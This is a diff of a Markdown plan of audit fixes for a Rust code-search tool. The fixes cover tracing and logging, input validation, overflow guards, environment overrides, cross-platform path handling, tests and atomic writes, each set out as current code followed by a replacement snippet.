+## P3.9 — Add a span to `nl::generate_nl_with_template`
+
+**Finding:** P3.9
+**Files:** `src/nl/mod.rs:209` (and transitively covers `:43, :65, :189`)
+**Why:** All four NL generators flow into `generate_nl_with_template`; a single `debug_span!` at that root site covers them all.
+
+### Current code
+```rust
+pub fn generate_nl_with_template(
+    chunk: &Chunk, callers: &[String], callees: &[String],
+    note: Option<&str>, summary: Option<&str>, hyde: Option<&str>,
+    template: NlTemplate,
+) -> String {
+    // ...
+}
+```
+
+### Replacement
+Insert at line 1 of the body:
+```rust
+let _span = tracing::debug_span!(
+    "generate_nl",
+    template = ?template,
+    chunk_kind = ?chunk.chunk_type,
+    len = chunk.content.len(),
+).entered();
+```
+
+---
+
+## P3.10 — `embed_documents`/`embed_query` completion events
+
+**Finding:** P3.10
+**Files:** `src/embedder/mod.rs:683` (`embed_documents`), `:722` (`embed_query`)
+**Why:** Entry spans only carry input fields; no completion event with output dim/count/time.
+
+### Current code
+```rust
+// inside embed_documents, after the loop returns embeddings:
+Ok(embeddings)
+
+// inside embed_query, before returning:
+Ok(embedding)
+```
+
+### Replacement
+At the bottom of `embed_documents` (just before `Ok(embeddings)`):
+```rust
+tracing::info!(
+    total = embeddings.len(),
+    dim = self.embedding_dim(),
+    input_count = texts.len(),
+    "embed_documents complete"
+);
+```
+At the bottom of `embed_query` (just before `Ok(embedding)`):
+```rust
+tracing::debug!(
+    dim = self.embedding_dim(),
+    "embed_query complete"
+);
+```
+
+---
+
+## P3.11 — Reranker `rerank_with_passages` length-mismatch warn + error
+
+**Finding:** P3.11
+**Files:** `src/reranker.rs:200-220`
+**Why:** When passages.len() != results.len(), the function silently scores arbitrary pairs and corrupts ranks. Hard error + structured warn.
+
+### Current code
+```rust
+pub fn rerank_with_passages(
+    &self, query: &str, passages: &[&str], results: &mut Vec<SearchResult>,
+) -> Result<(), RerankerError> {
+    let _span = tracing::info_span!("rerank_with_passages",
+        n = passages.len()).entered();
+    if results.is_empty() { return Ok(()); }
+    // ... compute_scores etc.
+}
+```
+
+### Replacement
+After the entry span / early-return:
+```rust
+if passages.len() != results.len() {
+    tracing::warn!(
+        passages = passages.len(),
+        results = results.len(),
+        "rerank_with_passages: length mismatch — caller bug, refusing to score",
+    );
+    return Err(RerankerError::InvalidArguments(format!(
+        "passages.len()={} != results.len()={}",
+        passages.len(), results.len()
+    )));
+}
+```
+Add the `InvalidArguments(String)` variant to `RerankerError` if not present.
+
+---
+
+## P3.12 — `train_data` git wrappers log non-zero exits
+
+**Finding:** P3.12
+**Files:** `src/train_data/git.rs:65-242` (`git_log` ~65, `git_diff_tree` ~131, `git_show` ~173)
+**Why:** Each wrapper bundles exit + stderr into an `Err` and returns silently. Operators with shallow clones hit "50% calls fail" with no journal trail.
+
+### Current code (pattern repeated 3x)
+```rust
+if !output.status.success() {
+    return Err(TrainDataError::Git(format!(
+        "git diff-tree failed: {}",
+        String::from_utf8_lossy(&output.stderr).trim()
+    )));
+}
+```
+
+### Replacement
+At each site, before the early-return:
+```rust
+if !output.status.success() {
+    let stderr = String::from_utf8_lossy(&output.stderr);
+    tracing::warn!(
+        exit = output.status.code(),
+        stderr = %stderr.trim(),
+        "git_diff_tree failed",  // change message per fn: git_log / git_show
+    );
+    return Err(TrainDataError::Git(format!(
+        "git diff-tree failed: {}", stderr.trim()
+    )));
+}
+```
+Apply consistently to `git_log` (~line 65), `git_diff_tree` (~131), `git_show` (~173). Keep the per-fn message identifier so operators can grep.
+
+---
+
+## P3.13 — Convert format-string `tracing::info!` to structured fields (9 sites)
+
+**Finding:** P3.13
+**Files:** `src/hnsw/build.rs:78,236`, `src/hnsw/persist.rs:210,638,771`, `src/reference.rs:220`, `src/cli/commands/train/export_model.rs:76`, `src/audit.rs:85,93`, `src/embedder/provider.rs:149`
+**Why:** Format-string interpolation produces unparseable rendered messages once OB-V1.30-1 lands JSON formatting. Pure-mechanical change to structured fields.
+
+### Current code → Replacement (one-pass sweep)
+```rust
+// src/hnsw/build.rs:78
+- tracing::info!("Building HNSW index with {} vectors", nb_elem);
++ tracing::info!(count = nb_elem, "Building HNSW index");
+
+// src/hnsw/build.rs:236
+- tracing::info!("HNSW index built: {} vectors", id_map.len());
++ tracing::info!(count = id_map.len(), "HNSW index built");
+
+// src/hnsw/persist.rs:210
+- tracing::info!("Saving HNSW index to {}/{}", dir.display(), basename);
++ tracing::info!(dir = %dir.display(), basename, "Saving HNSW index");
+
+// src/hnsw/persist.rs:638
+- tracing::info!("Loading HNSW index from {}/{}", dir.display(), basename);
++ tracing::info!(dir = %dir.display(), basename, "Loading HNSW index");
+
+// src/hnsw/persist.rs:771
+- tracing::info!("HNSW index loaded: {} vectors", id_map.len());
++ tracing::info!(count = id_map.len(), "HNSW index loaded");
+
+// src/reference.rs:220
+- tracing::info!("Loaded {} reference indexes", refs.len());
++ tracing::info!(count = refs.len(), "Loaded reference indexes");
+
+// src/cli/commands/train/export_model.rs:76
+- tracing::info!("Model exported to {}", output.display());
++ tracing::info!(output = %output.display(), "Model exported");
+
+// src/audit.rs:85
+- tracing::debug!("Failed to parse audit-mode.json: {}", e);
++ tracing::debug!(error = %e, "Failed to parse audit-mode.json");
+
+// src/audit.rs:93
+- .map_err(|e| tracing::debug!("Failed to parse expires_at: {}", e))
++ .map_err(|e| tracing::debug!(error = %e, "Failed to parse expires_at"))
+
+// src/embedder/provider.rs:149
+- tracing::debug!("Failed to symlink {}: {}", lib, e);
++ tracing::debug!(lib = %lib, error = %e, "Failed to symlink");
+```
+Verify post-fix with `rg 'tracing::(info|warn|debug|error)!\("[^"]*\{' src/` — should return zero hits in these files.
+
+---
+
+## P3.14 — `build_cluster` warn when corpus has chunks but no UMAP coords
+
+**Finding:** P3.14
+**Files:** `src/serve/data.rs:901, 1020` (in `build_cluster`)
+**Why:** Empty cluster view leaves operators staring at a blank pane with no journal hint that `cqs index --umap` is needed.
+
+### Current code (sketch — at the end of `build_cluster`)
+```rust
+Ok(ClusterResponse { nodes, skipped, total_chunks })
+```
+
+### Replacement
+Right before the return:
+```rust
+if nodes.is_empty() && skipped > 0 {
+    tracing::warn!(
+        skipped,
+        total_chunks,
+        "build_cluster: corpus has chunks but no UMAP coordinates — run `cqs index --umap`",
+    );
+}
+Ok(ClusterResponse { nodes, skipped, total_chunks })
+```
+
+---
+
+## P3.15 — Reject leading/trailing-dash slot names
+
+**Finding:** P3.15
+**Files:** `src/slot/mod.rs:159-178` (`validate_slot_name`); test block `:661+`
+**Why:** `-foo` collides with clap's flag parser; trailing dashes get stripped by various copy-paste pipelines.
+
+### Current code
+```rust
+pub fn validate_slot_name(name: &str) -> Result<(), SlotError> {
+    if name.is_empty() || name.len() > 32 { /* ... */ }
+    if !name.chars().all(|c| c.is_ascii_lowercase()
+        || c.is_ascii_digit() || c == '_' || c == '-') { /* ... */ }
+    Ok(())
+}
+```
+
+### Replacement
+After the existing checks, add:
+```rust
+if name.starts_with('-') || name.ends_with('-') {
+    return Err(SlotError::InvalidName(format!(
+        "slot name '{name}' cannot start or end with '-' \
+         (clap parses leading dash as a flag)"
+    )));
+}
+```
+Add tests in `src/slot/mod.rs::tests`: `validate_rejects_leading_dash`, `validate_rejects_trailing_dash`.
+
+---
+
+## P3.16 — Provider tests for malformed cmdline / `LD_LIBRARY_PATH`
+
+**Finding:** P3.16
+**Files:** `src/embedder/provider.rs:67-123`; new `#[cfg(test)] mod tests` in same file
+**Why:** No tests in `provider.rs` today; silent CPU fallback on weird inputs is the production failure mode.
+
+### Replacement
+Add at the bottom of `src/embedder/provider.rs`:
+```rust
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use std::env;
+    use std::sync::Mutex;
+
+    static ENV_LOCK: Mutex<()> = Mutex::new(());
+
+    #[test]
+    fn find_ld_library_dir_skips_empty_entries() {
+        let _g = ENV_LOCK.lock().unwrap();
+        let prev = env::var_os("LD_LIBRARY_PATH");
+        // SAFETY: serialized via ENV_LOCK
+        unsafe { env::set_var("LD_LIBRARY_PATH", ":/tmp:"); }
+        let dir = find_ld_library_dir();
+        // /tmp is the only non-empty entry that exists
+        assert_eq!(dir.as_deref(), Some(std::path::Path::new("/tmp")));
+        unsafe {
+            match prev {
+                Some(p) => env::set_var("LD_LIBRARY_PATH", p),
+                None => env::remove_var("LD_LIBRARY_PATH"),
+            }
+        }
+    }
+
+    #[test]
+    fn find_ld_library_dir_handles_unset() {
+        let _g = ENV_LOCK.lock().unwrap();
+        let prev = env::var_os("LD_LIBRARY_PATH");
+        unsafe { env::remove_var("LD_LIBRARY_PATH"); }
+        let dir = find_ld_library_dir();
+        assert!(dir.is_none());
+        unsafe { if let Some(p) = prev { env::set_var("LD_LIBRARY_PATH", p); } }
+    }
+}
+```
+
+---
+
+## P3.17 — `blake3_hex_or_passthrough` boundary tests
+
+**Finding:** P3.17
+**Files:** `src/cache.rs:709-721` + `src/cache.rs::tests`
+**Why:** Pin the uppercase / short-hex / passthrough surprises so a future "always-encode" tightening surfaces as an intentional break.
+
+### Replacement
+Add to `src/cache.rs::tests`:
+```rust
+#[test]
+fn blake3_hex_or_passthrough_uppercase_64_chars_passthrough() {
+    let upper = "ABCDEF0123456789".repeat(4); // 64 chars, all hex
+    assert_eq!(blake3_hex_or_passthrough(upper.as_bytes()), upper);
+}
+
+#[test]
+fn blake3_hex_or_passthrough_short_hex_string_gets_encoded() {
+    let short = "abcd"; // 4 hex chars
+    let out = blake3_hex_or_passthrough(short.as_bytes());
+    assert_eq!(out, "61626364"); // hex of ASCII 'a','b','c','d'
+}
+
+#[test]
+fn blake3_hex_or_passthrough_64_byte_non_hex_gets_encoded() {
+    let bytes = vec![0xAB; 64];
+    let out = blake3_hex_or_passthrough(&bytes);
+    assert_eq!(out.len(), 128);
+    assert!(out.chars().all(|c| c.is_ascii_hexdigit()));
+}
+```
+
+---
+
+## P3.18 — `SystemTime → i64` cache cast: guard against year-2554 wrap
+
+**Finding:** P3.18
+**Files:** `src/cache.rs:349-352, 551-555`
+**Why:** `as_secs() as i64` wraps silently above i64::MAX. Defense-in-depth.
+
+### Current code
+```rust
+// cache.rs:349-352 (write_batch)
+let now = std::time::SystemTime::now()
+    .duration_since(std::time::UNIX_EPOCH)
+    .unwrap_or_default()
+    .as_secs() as i64;
+
+// cache.rs:551-555 (prune_older_than)
+let cutoff = std::time::SystemTime::now()
+    .duration_since(std::time::UNIX_EPOCH)
+    .unwrap_or_default()
+    .as_secs() as i64
+    - (days as i64 * 86400);
+```
+
+### Replacement
+Add a helper at module top:
+```rust
+fn now_unix_i64() -> Result<i64, CacheError> {
+    let secs = std::time::SystemTime::now()
+        .duration_since(std::time::UNIX_EPOCH)
+        .map_err(|_| CacheError::Internal("clock before unix epoch".into()))?
+        .as_secs();
+    i64::try_from(secs)
+        .map_err(|_| CacheError::Internal("clock above i64 cap".into()))
+}
+```
+Replace both sites:
+```rust
+let now = now_unix_i64()?;
+// ...
+let cutoff = now_unix_i64()? - (days as i64 * 86400);
+```
+
+---
+
+## P3.20 — Clamp `cqs cache prune --older-than` to sane ceiling
+
+**Finding:** P3.20
+**Files:** `src/cache.rs:548, 551-555`
+**Why:** `u32::MAX * 86400` overflow / underflow → silent "prune everything" on typo.
+
+### Current code
+```rust
+pub fn prune_older_than(&self, days: u32) -> Result<usize, CacheError> {
+    let _span = tracing::info_span!("cache_prune", days).entered();
+    let cutoff = /* now */ - (days as i64 * 86400);
+    // ...
+}
+```
+
+### Replacement
+At the top of the function, clamp + reject:
+```rust
+pub fn prune_older_than(&self, days: u32) -> Result<usize, CacheError> {
+    const MAX_PRUNE_DAYS: u32 = 36_500; // 100 years
+    let days = days.min(MAX_PRUNE_DAYS);
+    let _span = tracing::info_span!("cache_prune", days).entered();
+    let now = now_unix_i64()?; // see P3.18
+    let cutoff = now - (days as i64 * 86400);
+    if cutoff < 0 {
+        return Err(CacheError::Internal(
+            format!("prune cutoff below epoch (days={days})")
+        ));
+    }
+    // ...
+}
+```
+
+---
+
+## P3.21 — Centralize `i64.max(0) as u32` clamp (8+ sites)
+
+**Finding:** P3.21
+**Files:** `src/serve/data.rs:290, 299, 300, 587, 588, 777, 778, 993, 994` (verified 9 sites — note line 290 is a `n_callers` clamp, not just line_start/line_end; audit said 8)
+**Why:** Repeated open-coded clamp pattern silently masks DB-corruption / migration bugs. Replace with a named helper that logs once on negative input.
+
+### Current code (one example site)
+```rust
+line_start: line_start.max(0) as u32,
+line_end: line_end.max(0) as u32,
+```
+
+### Replacement
+Add a helper at top of `src/serve/data.rs`:
+```rust
+/// Clamp an i64 SQL line number to u32, warning once if the input was
+/// negative (signals DB corruption or migration bug).
+#[inline]
+fn clamp_line_to_u32(v: i64) -> u32 {
+    if v < 0 {
+        tracing::warn!(value = v, "negative line number clamped to 0");
+        0
+    } else {
+        v.min(u32::MAX as i64) as u32
+    }
+}
+```
+Sweep all 8/9 occurrences of `<x>.max(0) as u32` to `clamp_line_to_u32(<x>)`. Verify with `rg 'max\(0\) as u32' src/serve/data.rs` returning zero hits.
+
+---
+
+## P3.22 — Daemon socket-thread join: warn on detach-after-timeout
+
+**Finding:** P3.22
+**Files:** `src/cli/watch.rs:2374-2400`
+**Why:** Doc-comment claims "joined cleanly" but deadline-fall-through silently detaches the thread. Add the warn so logs match reality.
+
+### Current code (sketch — the polling loop)
+```rust
+let deadline = Instant::now() + Duration::from_secs(5);
+loop {
+    if handle.is_finished() {
+        let _ = handle.join();
+        tracing::info!("Daemon socket thread joined cleanly");
+        break;
+    }
+    if Instant::now() > deadline { break; }
+    std::thread::sleep(Duration::from_millis(50));
+}
+```
+
+### Replacement
+```rust
+let deadline = Instant::now() + Duration::from_secs(5);
+let mut joined = false;
+loop {
+    if handle.is_finished() {
+        let _ = handle.join();
+        tracing::info!("Daemon socket thread joined cleanly");
+        joined = true;
+        break;
+    }
+    if Instant::now() > deadline { break; }
+    std::thread::sleep(Duration::from_millis(50));
+}
+if !joined {
+    tracing::warn!(
+        "Daemon socket thread did not exit within 5s; detaching"
+    );
+}
+```
+
+---
+
+## P3.23 — `diff::EMBEDDING_BATCH_SIZE` env override
+
+**Finding:** P3.23
+**Files:** `src/diff.rs:158`
+**Why:** Hardcoded 1000 doesn't scale with model dim; ~12 MB only at 1024-dim.
+
+### Current code
+```rust
+const EMBEDDING_BATCH_SIZE: usize = 1000;
+```
+
+### Replacement
+```rust
+fn embedding_batch_size() -> usize {
+    std::env::var("CQS_DIFF_EMBEDDING_BATCH_SIZE")
         .ok()
         .and_then(|v| v.parse::<usize>().ok())
-        .unwrap_or(DEFAULT_BATCH_LINE_LIMIT)
+        .filter(|&n| n > 0)
+        .unwrap_or(1000)
 }
 ```
-
-Replace uses of `MAX_BATCH_LINE_LEN` (grep the const for sites) with `batch_line_limit()`. Also update the CLI path that reads the same line (look for `MAX_LINE_LEN` or similar near the 50MB threshold mentioned in the triage entry — the CLI accepts 50 MB already, so the asymmetry is in this const).
-
-**Why**: `cqs --json diff --stdin` via daemon silently fails on diffs >1 MB; the same input works via CLI.
-
-**Verify**: `cargo build --features gpu-index`. `cargo test --features gpu-index --lib cli::batch`.
+Replace the const reference at the call site with `embedding_batch_size()`. Update the surrounding comment to mention `CQS_DIFF_EMBEDDING_BATCH_SIZE` and the dim sensitivity.
 
 ---
 
-### PF-V1.29-1: Daemon shell-join / re-split on hot path
+## P3.24 — Daemon `worker_threads` env override
 
-**File**: `/mnt/c/Projects/cqs/src/cli/watch.rs`
+**Finding:** P3.24
+**Files:** `src/cli/watch.rs:115-119`
+**Why:** Hardcoded `min(num_cpus, 4)` caps large-machine parallelism with no escape hatch.
 
-**Current code** (lines 315-331):
+### Current code
 ```rust
-let result = std::panic::catch_unwind(std::panic::AssertUnwindSafe(|| {
-    let full_line = if args.is_empty() {
-        command.to_string()
-    } else {
-        format!("{} {}", command, shell_words::join(&args))
-    };
-    let mut output = Vec::new();
+let worker_threads = std::thread::available_parallelism()
+    .map(|n| n.get()).unwrap_or(1).min(4);
+```
+
+### Replacement
+```rust
+let worker_threads = std::env::var("CQS_DAEMON_WORKER_THREADS")
+    .ok().and_then(|v| v.parse::<usize>().ok()).filter(|&n| n > 0)
+    .unwrap_or_else(|| {
+        std::thread::available_parallelism()
+            .map(|n| n.get()).unwrap_or(1).min(4)
+    });
+```
+
+---
+
+## P3.25 — `train_data::MAX_SHOW_SIZE` env override
+
+**Finding:** P3.25
+**Files:** `src/train_data/git.rs:167`; ideally moved into `src/limits.rs`
+**Why:** Hardcoded 50 MB silently drops large files from training-data extraction with no log signal.
+
+### Current code
+```rust
+const MAX_SHOW_SIZE: usize = 50 * 1024 * 1024;
+```
+
+### Replacement
+```rust
+fn max_show_size() -> usize {
+    std::env::var("CQS_TRAIN_GIT_SHOW_MAX_BYTES")
+        .ok().and_then(|v| v.parse::<usize>().ok()).filter(|&n| n > 0)
+        .unwrap_or(50 * 1024 * 1024)
+}
+```
+Update the caller to call `max_show_size()` and add a `tracing::warn!(path = %path, size, max, "git_show output exceeds max — skipping")` at the early-return site so callers can distinguish "too large" from "binary".
+
+---
+
+## P3.26 — Lift `BatchCmd::is_pipeable` into the registry
+
+**Finding:** P3.26
+**Files:** `src/cli/batch/commands.rs:325-364` (`is_pipeable`); registry at `src/cli/registry.rs`
+**Why:** #1114 collapsed Group-A/B exhaustive matches but the batch-side `is_pipeable` enum-match was missed; one row per command becomes one row + one batch arm.
+
+### Current code
+```rust
+// src/cli/batch/commands.rs:325-364
+impl BatchCmd {
+    pub fn is_pipeable(&self) -> bool {
+        match self {
+            BatchCmd::Search { .. } | BatchCmd::Gather { .. }
+            | BatchCmd::Scout { .. } | BatchCmd::Onboard { .. }
+            | /* ... ~30 arms ... */ => true,
+            _ => false,
+        }
+    }
+}
+```
+
+### Replacement
+Add an `is_pipeable: bool` flag to each row of `for_each_command!` in `src/cli/registry.rs`. Generate `BatchCmd::is_pipeable(&self)` from the table via a new `gen_is_pipeable_impl!()` macro. Delete the manual match in `commands.rs:325-364`.
+
+(If the BatchCmd enum itself isn't yet driven from the registry, this prompt narrows to "drive `is_pipeable` from the table"; the wider refactor of folding `BatchCmd` into the registry is P2-level and listed as #2.)
+
+---
+
+## P3.27 — `LlmProvider` resolver via registry slice
+
+**Finding:** P3.27
+**Files:** `src/llm/mod.rs:200-205, 284-304, 362-398`
+**Why:** Three hand-coded match arms (enum, env-var resolve, factory) per provider. Walk a `&[&dyn ProviderRegistry]` slice instead.
+
+### Current code
+```rust
+// llm/mod.rs:284-304 (resolve)
+match std::env::var("CQS_LLM_PROVIDER").as_deref() {
+    Ok("anthropic") | Err(_) => LlmProvider::Anthropic,
+    Ok("local") => LlmProvider::Local,
+    Ok(other) => { tracing::warn!(provider = other, "unknown CQS_LLM_PROVIDER, defaulting to anthropic"); LlmProvider::Anthropic }
+}
+
+// llm/mod.rs:362-398 (create_client)
+match provider {
+    LlmProvider::Anthropic => /* build AnthropicClient */,
+    LlmProvider::Local => /* build LocalProvider */,
+}
+```
+
+### Replacement
+Introduce a registry trait + slice:
+```rust
+pub(crate) trait ProviderRegistry: Sync {
+    fn name(&self) -> &'static str;
+    fn build(&self, cfg: &LlmConfig) -> Result<Box<dyn BatchProvider>, LlmError>;
+}
+
+static PROVIDERS: &[&dyn ProviderRegistry] = &[
+    &AnthropicRegistry, &LocalRegistry,
+];
+```
+`resolve()` walks `PROVIDERS.iter().find(|p| p.name() == requested)`; `create_client()` calls the matched `build()`. Add a provider = add one impl + one slice row.
+
+---
+
+## P3.28 — Tree-sitter registry coverage self-test
+
+**Finding:** P3.28
+**Files:** `src/language/queries/*.scm`; new test in `src/language/mod.rs`
+**Why:** An empty `chunks.scm` `include_str!`s as `""` and silently emits zero chunks. One assertion catches it.
+
+### Replacement
+Add to `src/language/mod.rs::tests`:
+```rust
+#[test]
+fn registry_languages_have_nonempty_chunk_query() {
+    for lang in REGISTRY.all() {
+        if !lang.has_grammar() { continue; }
+        assert!(
+            !lang.chunk_query.is_empty(),
+            "{:?}: chunk_query is empty — silent zero-chunk language",
+            lang.lang
+        );
+    }
+}
+```
+(`has_grammar` may already exist or can be a small helper that returns true when the lang's tree-sitter feature is enabled.)
+
+---
+
+## P3.29 — `find_project_root` markers as a data table
+
+**Finding:** P3.29
+**Files:** `src/cli/config.rs:155-162`
+**Why:** Hardcoded array works today; converting to a `static` table makes adding Maven / Gradle / .NET / Bazel a one-row change.
+
+### Current code
+```rust
+let markers = [
+    "Cargo.toml", "package.json", "pyproject.toml",
+    "setup.py", "go.mod", ".git",
+];
+for current in path.ancestors() {
+    for marker in &markers {
+        if current.join(marker).exists() { return Some(current.to_path_buf()); }
+    }
+}
+```
+
+### Replacement
+At module top:
+```rust
+/// (marker filename, label) — label is informational, not used in lookup.
+static PROJECT_ROOT_MARKERS: &[(&str, &str)] = &[
+    ("Cargo.toml", "rust"),
+    ("package.json", "node"),
+    ("pyproject.toml", "python"),
+    ("setup.py", "python"),
+    ("go.mod", "go"),
+    (".git", "fallback"),
+];
+```
+Iterate `PROJECT_ROOT_MARKERS.iter().any(|(m, _)| current.join(m).exists())`.
+
+---
+
+## P3.30 — `structural_matchers` shared library
+
+**Finding:** P3.30
+**Files:** `src/language/mod.rs:191, 345`; `src/structural.rs`
+**Why:** Currently per-language `Option<&[(name, fn)]>`; sharing common matchers (SwallowedException, AsyncIO, Mutex, Unsafe) across Python/JS/Go/Rust requires copying fn bodies.
+
+### Replacement
+Define a small set of cross-language matcher functions in `src/structural.rs` keyed by `(Pattern, Language)`:
+```rust
+pub(crate) static SHARED_MATCHERS: &[(Pattern, Language, StructuralMatcherFn)] = &[
+    (Pattern::SwallowedException, Language::Rust, matchers::rust::swallow_exc),
+    (Pattern::SwallowedException, Language::Python, matchers::python::swallow_exc),
+    // ...
+];
+```
+Have `LanguageDef::structural_matchers` either be derived from this table at lookup time (filter by `lang`), or keep the field but have each `definition_*` row reference the shared fn pointer. Adding a pattern-language pair = one slice row, not a new fn body.
+
+---
+
+## P3.31 — Embedder preset `extras` map (deferred-friendly)
+
+**Finding:** P3.31
+**Files:** `src/embedder/models.rs:163-300`
+**Why:** New cross-cutting preset attribute fans out to every row; flagging now since presets are still stable but pressure is rising.
+
+### Replacement
+Skip if presets are stable. If/when frequent attribute additions land, extend the `define_embedder_presets!` macro grammar with an `extras: { gpu_only = true, expects_bos = true }` block per row that desugars to a `HashMap<&'static str, ModelAttr>` field on `ModelConfig`. Required fields stay positional; sparse/optional ones go through `extras`.
+
+---
+
+## P3.32 — Cache paths use `dirs::cache_dir()` on Windows
+
+**Finding:** P3.32
+**Files:** `src/cache.rs:80-84` (`EmbeddingCache::default_path`), `src/cache.rs:1399-1403` (`QueryCache::default_path`), `src/cli/batch/commands.rs:373-376` (query_log)
+**Why:** Hardcoded `~/.cache/cqs/...` becomes a hidden `.cache` folder under `C:\Users\X\` on Windows; native is `%LOCALAPPDATA%\cqs\`.
+
+### Current code (pattern at all 3 sites)
+```rust
+dirs::home_dir()
+    .map(|h| h.join(".cache").join("cqs").join("embeddings.db"))
+```
+
+### Replacement
+```rust
+dirs::cache_dir()
+    .or_else(|| dirs::home_dir().map(|h| h.join(".cache")))
+    .map(|c| c.join("cqs").join("embeddings.db"))
+```
+Apply the same shape to `QueryCache::default_path` (`query_cache.db`) and the `query_log.jsonl` path in `cli/batch/commands.rs:373-376`.
+
+---
+
+## P3.33 — `dispatch_drift/diff` JSON file fields use `normalize_path`
+
+**Finding:** P3.33
+**Files:** `src/suggest.rs:101`, `src/store/types.rs:220`
+**Why:** Two more PB-V1.29-5 sites that emit Windows backslashes via `.display().to_string()`.
+
+### Current code
+```rust
+// src/suggest.rs:101
+let file = dead.chunk.file.display().to_string();
+
+// src/store/types.rs:220
+let file_display = file.display().to_string();
+```
+
+### Replacement
+```rust
+// src/suggest.rs:101
+let file = crate::normalize_path(&dead.chunk.file);
+
+// src/store/types.rs:220
+let file_display = crate::normalize_path(file);
+```
+(If `normalize_path` accepts `&Path` not `&PathBuf`, adjust the borrow.)
+
+---
+
+## P3.34 — `find_ld_library_dir` Windows arm (or doc the gap)
+
+**Finding:** P3.34
+**Files:** `src/embedder/provider.rs:115-123`
+**Why:** Currently `cfg(target_os="linux")`-gated; no Windows equivalent. Either add one or doc the delegation explicitly.
+
+### Replacement (lower-cost: doc the gap)
+Add at the top of `ensure_ort_provider_libs`:
+```rust
+/// On Linux this walks `LD_LIBRARY_PATH` (`:`-separated) and symlinks ORT
+/// provider .so files into the runtime's search dir. On Windows and macOS
+/// provider DLL/dylib resolution is delegated entirely to ORT's loader
+/// (Windows: `PATH` search; macOS: `DYLD_*` paths). If a future regression
+/// surfaces on those platforms, add an arm with `;`-split for `PATH` (Win)
+/// or `DYLD_LIBRARY_PATH` (mac).
+```
+Keep behavior unchanged.
+
+---
+
+## P3.35 — Document `index.lock` advisory-vs-mandatory split
+
+**Finding:** P3.35
+**Files:** `src/cli/files.rs:120-213`
+**Why:** Same code, two very different concurrency contracts (Linux advisory `flock` vs Windows mandatory `LockFileEx`). Doc + one-time warn so callers can reason about it.
+
+### Replacement
+1. Extend the `acquire_index_lock` doc-comment to spell out: Linux/macOS = advisory (non-cqs writers can corrupt); Windows = mandatory (third-party tools may see "sharing violation"); WSL `/mnt/c/` follows Linux semantics for the call but Windows for the underlying file.
+2. On Windows only, add a one-shot `tracing::warn!` (gated on `OnceLock`) at first lock acquisition:
+```rust
+#[cfg(windows)]
+{
+    static WARNED: std::sync::OnceLock<()> = std::sync::OnceLock::new();
+    WARNED.get_or_init(|| {
+        tracing::warn!(
+            "index.lock is mandatory on Windows — third-party tools opening \
+             index.db may fail with sharing violations while cqs is running"
+        );
+    });
+}
+```
+
+---
+
+## P3.36 — `is_wsl_drvfs_path` matches UNC + uppercase drives
+
+**Finding:** P3.36
+**Files:** `src/config.rs:92-101`
+**Why:** Misses `//wsl.localhost/`, `//wsl$/`, and uppercase drive letters when WSL `automount.options=case=force` is set.
+
+### Current code
+```rust
+pub fn is_wsl_drvfs_path(path: &Path) -> bool {
+    let s = path.to_string_lossy();
+    s.starts_with("/mnt/")
+        && s.chars().nth(5).is_some_and(|c| c.is_ascii_lowercase())
+        && s.chars().nth(6) == Some('/')
+}
+```
+
+### Replacement
+```rust
+pub fn is_wsl_drvfs_path(path: &Path) -> bool {
+    let s = path.to_string_lossy();
+    // Standard /mnt/<letter>/ — accept upper or lowercase
+    if let Some(rest) = s.strip_prefix("/mnt/") {
+        if let (Some(c), Some('/')) = (rest.chars().next(), rest.chars().nth(1)) {
+            if c.is_ascii_alphabetic() { return true; }
+        }
+    }
+    // UNC paths reaching back into WSL
+    if s.starts_with("//wsl.localhost/") || s.starts_with("//wsl$/") {
+        return true;
+    }
+    false
+}
+```
+
+---
+
+## P3.37 — `blame.rs` git_file via `normalize_slashes`
+
+**Finding:** P3.37
+**Files:** `src/cli/commands/io/blame.rs:113-115`
+**Why:** Current `replace('\\', "/")` only handles backslashes; verbatim `\\?\` prefix slips through, breaking `git log --format=... -- <file>`.
+
+### Current code
+```rust
+let git_file = rel_file.replace('\\', "/");
+```
+
+### Replacement
+```rust
+let git_file = crate::normalize_slashes(&rel_file);
+```
+
+---
+
+## P3.38 — Daemon socket-path: warn on `XDG_RUNTIME_DIR` unset (Linux only)
+
+**Finding:** P3.38
+**Files:** `src/daemon_translate.rs:179-188`
+**Why:** Silent fallback to `/tmp` (mode 1777) hides a meaningful trust drop on multi-user Linux. macOS `/var/folders/...` is fine.
+
+### Current code
+```rust
+fn daemon_socket_path() -> PathBuf {
+    let dir = std::env::var_os("XDG_RUNTIME_DIR")
+        .map(PathBuf::from)
+        .unwrap_or_else(std::env::temp_dir);
+    dir.join(/* per-user socket name */)
+}
+```
+
+### Replacement
+```rust
+fn daemon_socket_path() -> PathBuf {
+    if let Some(d) = std::env::var_os("XDG_RUNTIME_DIR") {
+        return PathBuf::from(d).join(/* socket name */);
+    }
+    #[cfg(target_os = "linux")]
     {
-        let ctx = batch_ctx
-            .lock()
-            .unwrap_or_else(|poisoned| poisoned.into_inner());
-        ctx.dispatch_line(&full_line, &mut output);
+        static WARNED: std::sync::OnceLock<()> = std::sync::OnceLock::new();
+        WARNED.get_or_init(|| {
+            tracing::info!(
+                "XDG_RUNTIME_DIR unset — daemon socket falls back to temp_dir; \
+                 consider XDG_RUNTIME_DIR=/run/user/$(id -u)"
+            );
+        });
     }
+    std::env::temp_dir().join(/* socket name */)
+}
 ```
 
-**Fix**:
+---
 
-Add a `dispatch_tokens` entry point on `BatchContext` that accepts `(command, args)` pre-split. The existing `dispatch_line` does `shell_words::split` on the concatenated string, which is wasteful when the daemon already has the tokens. Sketch:
+## P3.39 — `write_slot_model` / `write_active_slot` use `atomic_replace`
 
+**Finding:** P3.39
+**Files:** `src/slot/mod.rs:237-277` (`write_slot_model`), `src/slot/mod.rs:363-406` (`write_active_slot`)
+**Why:** Bespoke temp+rename without parent-dir fsync. `crate::fs::atomic_replace` already does this for `notes.toml` / `audit-mode.json`.
+
+### Current code (sketch — both functions)
 ```rust
-// In src/cli/batch/mod.rs:
-pub(crate) fn dispatch_tokens(
-    &self,
-    command: &str,
-    args: &[String],
-    out: &mut impl std::io::Write,
-) {
-    // Same body as dispatch_line but skips shell_words::split and the NUL-byte
-    // check is applied directly on the (command, args) inputs.
-    let tokens: Vec<String> = std::iter::once(command.to_string())
-        .chain(args.iter().cloned())
-        .collect();
-    if let Err(msg) = reject_null_tokens(&tokens) {
-        // existing error arm
-        return;
+let tmp = dir.join(format!(".slot.toml.{}.tmp", temp_suffix()));
+let mut f = fs::File::create(&tmp)?;
+f.write_all(contents.as_bytes())?;
+f.sync_all()?;
+fs::rename(&tmp, &final_path)?;
+// no parent-dir fsync
+```
+
